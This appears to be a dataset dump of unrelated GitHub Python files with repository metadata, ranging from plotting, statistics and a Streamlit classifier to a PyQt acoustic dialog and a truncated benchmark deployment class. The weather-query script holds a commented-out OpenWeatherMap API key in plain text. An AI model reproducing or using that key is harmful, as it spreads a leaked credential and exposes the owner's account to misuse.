plt.contour(x, y, z,levels=[1,2,3,4,5,6],lw=0.5)
cs=plt.contour(x, y, z,levels=[1],lw=10)
plt.xlim([-75,-73])
plt.ylim([-44,-42])
path=cs.collections[0].get_paths()
p=path[1]
points=c_[Xlock.ravel(),Ylock.ravel()]
i=where(p.contains_points(points)==True)[0]
m=lock.ravel()[i].mean()
plt.title('Mean locking inside 1m contour is %.2f' % (m))
plt.figure()
plt.scatter(points[i,0],points[i,1],c=lock.ravel()[i],lw=0,vmin=0,vmax=1.0,cmap=plt.cm.magma)
plt.colorbar()
plt.title('Locking inside 1m contour')
plt.xlim([-75,-73])
plt.ylim([-44,-42])
plt.show() | Ogweno/mylife | Melinka/get_avg_locking.py | get_avg_locking.py | py | 1,173 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.genfromtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "mudpy.view.plot_grd",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cm",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "matplotli... |
5216881963 | #!/usr/bin/env python3
import sys
from functools import reduce
import math
def sum(nums):
return reduce(lambda x, y: x + y, nums, 0)
def avg(nums):
return sum(nums) / len(nums)
def stddev(nums):
numerator = reduce(lambda x, y: (y - avg(nums))*(y - avg(nums)) + x, nums, 0)
return math.sqrt(numerator / (len(nums) - 1))
def summary(filename):
nums = []
with open(filename, 'r') as f:
for line in f:
try:
nums.append(float(line))
except ValueError:
continue
return (sum(nums), avg(nums), stddev(nums))
def main():
filenames = sys.argv[1:]
for f in filenames:
s = summary(f)
print(f'File: {f} Sum: {s[0]:.6f} Average: {s[1]:.6f} Stddev: {s[2]:.6f}')
if __name__ == "__main__":
main()
| lawrencetheabhorrence/Data-Analysis-2020 | hy-data-analysis-with-python-2020/part02-e05_summary/src/summary.py | summary.py | py | 759 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "functools.reduce",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_numbe... |
34983405141 | #!/usr/bin/env python3
import pyowm
from pyowm.exceptions import OWMError
import sys, argparse
from datetime import datetime
import os
#os.environ['OPENWEATHER_API_KEY'] = 'aa1ab6974298fc6bf7303d6a22e073f9'
#os.environ['CITY_NAME'] = 'Honolulu'
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('-k', required=False, metavar='your_api_key')
parser.add_argument('-p', required=False, metavar='\"Some Place,US\"')
args = parser.parse_args()
api_key = str(os.environ['OPENWEATHER_API_KEY'])
place = str(os.environ['CITY_NAME'])
print ('Using key ' + api_key + ' to query temperature in \"' + place + '\"...' )
owm = pyowm.OWM(api_key)
try:
observation = owm.weather_at_place(place)
except OWMError as err:
print (err)
sys.exit(2)
w = observation.get_weather()
p = observation.get_location()
print ( 'source=openweathermap ' + 'city=' + '"' + p.get_name() + '"' + ' description=' + '"' + str(w.get_status()) + '"' + \
' temp=' + str(w.get_temperature('celsius')['temp']) +'C' + ' humidity=' + str(w.get_humidity()) )
if __name__ == "__main__":
main(sys.argv[1:])
| vasooo/pannet | exercise_1/getweather.py | getweather.py | py | 1,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pyowm.OWM",
... |
16098074633 | from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager # The Webdriver
import pyautogui # To Click
import time # To wait and all
custom_site = input("Enter The Website to Download Video...") # Take the youtube video link as the input
driver = webdriver.Firefox(executable_path=GeckoDriverManager().install()) # installs the webdriver.
cus = custom_site.find('y') # Finds 'Y' in the Link.
suc = custom_site[0:cus] # Slices upto but not includes y
final_website = suc + 'ss' + custom_site[cus:] # WIth the help of string concatenation it adds ss to the
# link before the letter 'y'
web = driver.get(final_website) # Uses the Selenium Web driver to go to the website.
driver.implicitly_wait(5) # Waits For 5 Secs
driver.find_element_by_xpath(r'/html/body/div[1]/div[1]/div[2]/div[4]/div/div[1]/div[2]/div[2]/div[1]/a').click()
# Finds the download button by x path
# Often after clicking the download button the new tab gets open automatically.
# If a new tab gets open it closes that tab.
# You Can Run the below program in your terminal to get the live position of your mouse
# import pyautogui
# pyautogui.displayMousePosition()
def new_tab_cut():
x = 504 # You can change the x cordinate to your mouse position.
y = 48 # # You can change the y cordinate to your mouse position.
pyautogui.moveTo(x, y, duration=1.2)
pyautogui.click(x, y)
# The Following block of code is used to click on the download button in firefix browser.
def save_file():
x1 = 504
y1 = 471
pyautogui.moveTo(x1, y1, duration=1)
pyautogui.click(x1, y1)
time.sleep(1)
x2 = 916
y2 = 575
pyautogui.click(x2, y2)
time.sleep(1)
new_tab_cut()
save_file()
time.sleep(100)
driver.quit()
print("Downloaded")
# executable_path=GeckoDriverManager().install() | JhaRishikesh/Projects | YouTube Downloader.py | YouTube Downloader.py | py | 1,902 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "webdriver_manager.firefox.GeckoDriverManager",
"line_number": 6,
"usage_type": "call"
},
... |
34102793225 | import pyperclip, shelve, sys
mcbShelf = shelve.open('mcb')
#сохранятся содержимое буфера обмена
if len(sys.argv)==3 and sys.argv[1].lower() == 'save':
mcbShelf[sys.argv[2]] = pyperclip.paste()
print(sys.argv)
elif len(sys.argv) == 2:
if sys.argv[1].lower() == 'list':
pyperclip.copy(str(list(mcbShelf.keys())))
print(str(list(mcbShelf.keys())))
elif sys.argv[1] in mcbShelf:
t=mcbShelf[sys.argv[1]]
pyperclip.copy(t)
print(mcbShelf[sys.argv[1]])
mcbShelf.close()
| alex3287/PyCharmProjects | a_b_s/bufer.py | bufer.py | py | 555 | python | ru | code | 1 | github-code | 36 | [
{
"api_name": "shelve.open",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "pyperclip.paste",
"line_numb... |
33293843048 | import pandas as pd
import requests
from io import StringIO
import plotly.express as px
import plotly.graph_objects as go
import seaborn as sns
import streamlit as st
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
import numpy as np
from matplotlib.colors import ListedColormap
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_moons, make_circles, make_classification
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
@st.cache
def split_data(df):
features= df[['sepal.length', 'sepal.width', 'petal.length', 'petal.width']].values
labels = df['variety'].values
return train_test_split(features, labels, train_size=0.7, random_state=1)
def getData():
SL = st.slider("Sepal length", 2,25, 3)
SW = st.slider("Sepal width", 2,25, 3)
PL = st.slider("Petal length", 2,25, 3)
PW = st.slider("Petal width", 2,25, 3)
print(f"LOG: the prediction input is: {[SL, SW, PL, PW]}")
return np.array([SL, SW, PL, PW]).reshape(1,-1)
def main(df):
X_train,X_test, y_train, y_test = split_data(df)
alg = ["Decision Tree", "Support Vector Machine", "KNeighborsClassifier", "Linear SVC", "SVC", "GaussianPro00cessClassifier", "DecisionTreeClassifier", "RandomForestClassifier", "MLPClassifier", "AdaBoostClassifier", "GaussianNB", "QuadraticDiscriminantAnalysis"]
classifier = st.selectbox('Which algorithm?', alg)
if classifier=='Decision Tree':
dtc = DecisionTreeClassifier()
dtc.fit(X_train, y_train)
acc = dtc.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_dtc = dtc.predict(X_test)
cm_dtc=confusion_matrix(y_test,pred_dtc)
st.write('Confusion matrix: ', cm_dtc)
input = getData()
st.write('The classification is: ', dtc.predict(input)[0])
elif classifier == 'Support Vector Machine':
svm=SVC()
svm.fit(X_train, y_train)
acc = svm.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_svm = svm.predict(X_test)
cm=confusion_matrix(y_test,pred_svm)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', svm.predict(input)[0])
elif classifier == "KNeighborsClassifier":
clf = KNeighborsClassifier(3)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "Linear SVC":
clf = SVC(kernel="linear", C=0.025)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "SVC":
clf = SVC(gamma=2, C=1)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "GaussianProcessClassifier":
clf = GaussianProcessClassifier(1.0 * RBF(1.0))
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "DecisionTreeClassifier":
clf = DecisionTreeClassifier(max_depth=5)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "RandomForestClassifier":
clf = RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "MLPClassifier":
clf = MLPClassifier(alpha=1, max_iter=1000)
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "AdaBoostClassifier":
clf = AdaBoostClassifier()
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "GaussianNB":
clf = GaussianNB()
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
elif classifier == "QuadraticDiscriminantAnalysis":
clf = QuadraticDiscriminantAnalysis()
clf.fit(X_train, y_train)
acc = clf.score(X_test, y_test)
st.write('Accuracy: ', acc)
pred_clf = clf.predict(X_test)
cm = confusion_matrix(y_test, pred_clf)
st.write('Confusion matrix: ', cm)
input = getData()
st.write('The classification is: ', clf.predict(input)[0])
@st.cache
def loadData():
orig_url = "https://drive.google.com/file/d/1qgGPtbVk7dUBZxF-Q-F_xP-jMmAh11pV/view?usp=sharing"
file_id = orig_url.split('/')[-2]
dwn_url='https://drive.google.com/uc?export=download&id=' + file_id
url = requests.get(dwn_url).text
csv_raw = StringIO(url)
dfs = pd.read_csv(csv_raw)
return dfs
df = loadData()
st.title('Iris')
if st.checkbox('Show dataframe'):
st.write(df)
st.subheader('Scatter plot')
species = st.multiselect('Show iris per variety?', df['variety'].unique())
if not species:
species = df['variety'].unique()
col1 = st.selectbox('Which feature on x?', df.columns[0:4])
col2 = st.selectbox('Which feature on y?', df.columns[0:4])
if col1 == col2:
col1 = df.columns[1]
col2 = df.columns[0]
new_df = df[(df['variety'].isin(species))]
st.write(new_df)
# create figure using plotly express
fig = px.scatter(new_df, x =col1,y=col2, color='variety')
# Plot!
st.plotly_chart(fig)
st.subheader('Histogram')
feature = st.selectbox('Which feature?', df.columns[0:4])
# Filter dataframe
new_df2 = df[(df['variety'].isin(species))][feature]
fig2 = px.histogram(new_df, x=feature, color="variety", marginal="rug")
st.plotly_chart(fig2)
st.subheader('Machine Learning models')
main(df) | Tudor1415/mlsandbox | main.py | main.py | py | 8,562 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "streamlit.cache",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "streamlit.slider",
"line_number": 41,
"usage_type": "call"
},
{
"ap... |
14075716492 | import matplotlib
matplotlib.rc('text', usetex = True)
from pylab import *
import os
#Use the dt distributions from Crescent City
#tide gauge to make example plots
d = loadtxt('cumulative_probs.yearly.100.txt')
figure(1,(12,9))
clf()
axes((.1,.1,.8,.38))
#Add 1.13 to get s referenced to MSL
s = d[:,0] - 2. +1.13
plot([-2.6,0.6,0.6,1.0],[1,1,0,0],'k')
for i in [7,6,5,3,1]:
plot(s,d[:,i])
legend(['dt = infinity','dt = 24 hours', 'dt = 12 hours', 'dt = 4 hours', \
'dt = 2 hour', 'dt = 0'],'lower left')
title('Cumulative Distributions for dt-Method',fontsize=18)
plot([-1.08,-1.08,-3],[1.05,0.776,0.776],'r--',linewidth=3)
plot([-1.08],[0.776],'ro')
text(-2.8,0.8,'desired probability',fontsize=17)
ylim(-0.1,1.1)
xticks([-2,-1,0,0.6,1.],['MLW','MSL','MHW','HHW',r'${\bf \hat{\xi}}$'],fontsize=18)
yticks(fontsize=18)
ylabel('probability ',fontsize=18)
xlabel(r'tide stage ${\bf \hat{\xi}}$',fontsize=18)
axes((.1,.55,.8,.38))
s = linspace(-3,0.6,101)
def h(s):
h = (s+1.4) + (s+1.6)**2
h = where(s<-1.4, 0, h)
return h
srun = linspace(-2.,0,6)
plot([-1.4],[0.0],'bo')
plot(srun,h(srun),'bo')
#Now plot the black line
srun2=zeros(9)
srun2[0]=-3.; srun2[1:3]=srun[0:2]; srun2[3]=-1.4; srun2[4:8]=srun[2:6];
srun2[8]=.6;
plot(srun2,h(srun2),'k')
plot([-3,-1.08,-1.08],[0.59,0.59,-0.5],'r--',linewidth=3)
ylim(-0.5,5)
xticks([-2,-1,0,0.6,1.],['MLW','MSL','MHW','HHW',r'${\bf \hat{\xi}}$'],fontsize=18)
yticks([0,2,4],['0','1','2'],fontsize=18)
plot([-1.08],[0.59],'ro')
text(-2.8,0.8,r'exceedance level ${\bf \zeta_i}$',fontsize=17)
text(-1.2,-.45,r'${\bf \hat{\xi_i}}$',fontsize=15)
xlim(-3,1)
ylabel(r'Quantity of Interest ${\bf \zeta}$',fontsize=18)
title(r"${\bf E_{jk}}$'s GeoClaw Simulation Curve at one Location",fontsize=18)
savefig('tidepofzeta_dt.png')
| rjleveque/pattern-method-paper | programs/tidepofzeta_dt.py | tidepofzeta_dt.py | py | 1,796 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.rc",
"line_number": 2,
"usage_type": "call"
}
] |
37662096318 | from PyQt5.QtWidgets import QLineEdit, QToolButton, QWidget, QFileDialog, QDialog, QTreeWidget, QRadioButton, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QMessageBox
from pulse.utils import error
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
from pulse.postprocessing.plot_acoustic_data import get_acoustic_frf
import matplotlib.pyplot as plt
import numpy as np
class SnaptoCursor(object):
def __init__(self, ax, x, y, show_cursor):
self.ax = ax
self.x = x
self.y = y
self.show_cursor = show_cursor
if show_cursor:
self.vl = self.ax.axvline(x=x[0], color='k', alpha=0.3, label='_nolegend_') # the vertical line
self.hl = self.ax.axhline(y=y[0], color='k', alpha=0.3, label='_nolegend_') # the horizontal line
self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
# self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
# plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
def mouse_move(self, event):
if self.show_cursor:
if not event.inaxes: return
x, y = event.xdata, event.ydata
if x>=np.max(self.x): return
indx = np.searchsorted(self.x, [x])[0]
x = self.x[indx]
y = self.y[indx]
self.vl.set_xdata(x)
self.hl.set_ydata(y)
self.marker.set_data([x],[y])
self.marker.set_label("x: %1.2f // y: %1.2f" % (x, y))
plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
self.ax.figure.canvas.draw_idle()
class PlotAcousticFrequencyResponseInput(QDialog):
def __init__(self, mesh, analysisMethod, frequencies, solution, list_node_ids, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('pulse/uix/user_input/ui/plotAcousticFrequencyResponseInput.ui', self)
icons_path = 'pulse\\data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.mesh = mesh
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.nodeID = 0
self.imported_data = None
self.writeNodes(list_node_ids)
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
self.pushButton_AddImportedPlot.clicked.connect(self.ImportResults)
self.checkBox_dB = self.findChild(QCheckBox, 'checkBox_dB')
self.pushButton = self.findChild(QPushButton, 'pushButton')
self.pushButton.clicked.connect(self.check)
self.exec_()
def reset_imported_data(self):
self.imported_data = None
self.messages("The plot data has been reseted.")
def writeNodes(self, list_node_ids):
text = ""
for node in list_node_ids:
text += "{}, ".format(node)
self.lineEdit_nodeID.setText(text)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.check()
elif event.key() == Qt.Key_Escape:
self.close()
def radioButtonEvent_YAxis(self):
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
def radioButtonEvent_save_data(self):
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
def messages(self, msg, title = " Information "):
msg_box = QMessageBox()
msg_box.setIcon(QMessageBox.Information)
msg_box.setText(msg)
msg_box.setWindowTitle(title)
msg_box.exec_()
def choose_path_import_results(self):
self.import_path, _ = QFileDialog.getOpenFileName(None, 'Open file', self.userPath, 'Dat Files (*.dat)')
self.import_name = basename(self.import_path)
self.lineEdit_ImportResultsPath.setText(str(self.import_path))
def ImportResults(self):
self.imported_data = np.loadtxt(self.import_path, delimiter=",")
self.legend_imported = "imported data: "+ basename(self.import_path).split(".")[0]
self.tabWidget_plot_results.setCurrentWidget(self.tab_plot)
self.messages("The results has been imported.")
def choose_path_export_results(self):
self.save_path = QFileDialog.getExistingDirectory(None, 'Choose a folder to export the results', self.userPath)
self.save_name = basename(self.save_path)
self.lineEdit_SaveResultsPath.setText(str(self.save_path))
def check(self, export=False):
try:
tokens = self.lineEdit_nodeID.text().strip().split(',')
try:
tokens.remove('')
except:
pass
node_typed = list(map(int, tokens))
if len(node_typed) == 1:
try:
self.nodeID = self.mesh.nodes[node_typed[0]].external_index
except:
message = [" The Node ID input values must be\n major than 1 and less than {}.".format(len(self.nodes))]
error(message[0], title = " INCORRECT NODE ID INPUT! ")
return
elif len(node_typed) == 0:
error("Please, enter a valid Node ID!")
return
else:
error("Multiple Node IDs", title="Error Node ID's")
return
except Exception:
error("Wrong input for Node ID's!", title="Error Node ID's")
return
if self.checkBox_dB.isChecked():
self.scale_dB = True
elif not self.checkBox_dB.isChecked():
self.scale_dB = False
if not export:
self.plot()
def ExportResults(self):
if self.lineEdit_FileName.text() != "":
if self.save_path != "":
self.export_path_folder = self.save_path + "/"
else:
error("Plese, choose a folder before trying export the results!")
return
else:
error("Inform a file name before trying export the results!")
return
self.check(export=True)
freq = self.frequencies
self.export_path = self.export_path_folder + self.lineEdit_FileName.text() + ".dat"
if self.save_Absolute:
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID)
header = "Frequency[Hz], Real part [Pa], Imaginary part [Pa], Absolute [Pa]"
data_to_export = np.array([freq, np.real(response), np.imag(response), np.abs(response)]).T
elif self.save_Real_Imaginary:
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID)
header = "Frequency[Hz], Real part [Pa], Imaginary part [Pa]"
data_to_export = np.array([freq, np.real(response), np.imag(response)]).T
np.savetxt(self.export_path, data_to_export, delimiter=",", header=header)
self.messages("The results has been exported.")
def dB(self, data):
p_ref = 20e-6
return 20*np.log10(data/p_ref)
def plot(self):
fig = plt.figure(figsize=[12,7])
ax = fig.add_subplot(1,1,1)
frequencies = self.frequencies
response = get_acoustic_frf(self.mesh, self.solution, self.nodeID, absolute=self.plotAbs, real=self.plotReal, imag=self.plotImag)
if self.scale_dB :
if self.plotAbs:
response = self.dB(response)
ax.set_ylabel("Acoustic Response - Absolute [dB]", fontsize = 14, fontweight = 'bold')
else:
if self.plotReal:
ax.set_ylabel("Acoustic Response - Real [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotImag:
ax.set_ylabel("Acoustic Response - Imaginary [Pa]", fontsize = 14, fontweight = 'bold')
self.messages("The dB scalling can only be applied with the absolute \nY-axis representation, therefore, it will be ignored.")
else:
if self.plotAbs:
ax.set_ylabel("Acoustic Response - Absolute [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotReal:
ax.set_ylabel("Acoustic Response - Real [Pa]", fontsize = 14, fontweight = 'bold')
elif self.plotImag:
ax.set_ylabel("Acoustic Response - Imaginary [Pa]", fontsize = 14, fontweight = 'bold')
# mng = plt.get_current_fig_manager()
# mng.window.state('zoomed')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, show_cursor=True)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Acoustic Pressure at node {}".format(self.nodeID)
if self.imported_data is None:
if self.plotAbs and not self.scale_dB:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
data = self.imported_data
imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
if self.scale_dB :
imported_Yvalues = self.dB(imported_Yvalues)
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs and not self.scale_dB:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('Frequency Response: {} Method').format(self.analysisMethod), fontsize = 18, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show() | atbrandao/OpenPulse_f | pulse/uix/user_input/plotAcousticFrequencyResponseInput.py | plotAcousticFrequencyResponseInput.py | py | 13,604 | python | en | code | null | github-code | 36 | [
{
"api_name": "numpy.max",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.searchsorted",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.legend",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pypl... |
6689931275 | import json
import os
from signal import SIGKILL
from statistics import mean
from typing import List, Optional
from sebs.cache import Cache
from sebs.local.function import LocalFunction
from sebs.storage.minio import Minio, MinioConfig
from sebs.utils import serialize, LoggingBase
class Deployment(LoggingBase):
@property
def measurement_file(self) -> Optional[str]:
return self._measurement_file
@measurement_file.setter
def measurement_file(self, val: Optional[str]):
self._measurement_file = val
def __init__(self):
super().__init__()
self._functions: List[LocalFunction] = []
self._storage: Optional[Minio]
self._inputs: List[dict] = []
self._memory_measurement_pids: List[int] = []
self._measurement_file: Optional[str] = None
def add_function(self, func: LocalFunction):
self._functions.append(func)
if func.memory_measurement_pid is not None:
self._memory_measurement_pids.append(func.memory_measurement_pid)
def add_input(self, func_input: dict):
self._inputs.append(func_input)
def set_storage(self, storage: Minio):
self._storage = storage
def serialize(self, path: str):
with open(path, "w") as out:
config: dict = {
"functions": self._functions,
"storage": self._storage,
"inputs": self._inputs,
}
if self._measurement_file is not None:
config["memory_measurements"] = {
"pids": self._memory_measurement_pids,
"file": self._measurement_file,
}
out.write(serialize(config))
@staticmethod
def deserialize(path: str, cache_client: Cache) -> "Deployment":
with open(path, "r") as in_f:
input_data = json.load(in_f)
deployment = Deployment()
for input_cfg in input_data["inputs"]:
deployment._inputs.append(input_cfg)
for func in input_data["functions"]:
deployment._functions.append(LocalFunction.deserialize(func))
if "memory_measurements" in input_data:
deployment._memory_measurement_pids = input_data["memory_measurements"]["pids"]
deployment._measurement_file = input_data["memory_measurements"]["file"]
deployment._storage = Minio.deserialize(
MinioConfig.deserialize(input_data["storage"]), cache_client
)
return deployment
def shutdown(self, output_json: str):
if len(self._memory_measurement_pids) > 0:
self.logging.info("Killing memory measurement processes")
# kill measuring processes
for proc in self._memory_measurement_pids:
os.kill(proc, SIGKILL)
if self._measurement_file is not None:
self.logging.info(f"Gathering memory measurement data in {output_json}")
# create dictionary with the measurements
measurements: dict = {}
precision_errors = 0
with open(self._measurement_file, "r") as file:
for line in file:
if line == "precision not met\n":
precision_errors += 1
line_content = line.split()
if len(line_content) == 0:
continue
if not line_content[0] in measurements:
try:
measurements[line_content[0]] = [int(line_content[1])]
except ValueError:
continue
else:
try:
measurements[line_content[0]].append(int(line_content[1]))
except ValueError:
continue
for container in measurements:
measurements[container] = {
"mean mem. usage": f"{mean(measurements[container])/1e6} MB",
"max mem. usage": f"{max(measurements[container])/1e6} MB",
"number of measurements": len(measurements[container]),
"full profile (in bytes)": measurements[container],
}
# write to output_json file
with open(output_json, "w") as out:
if precision_errors > 0:
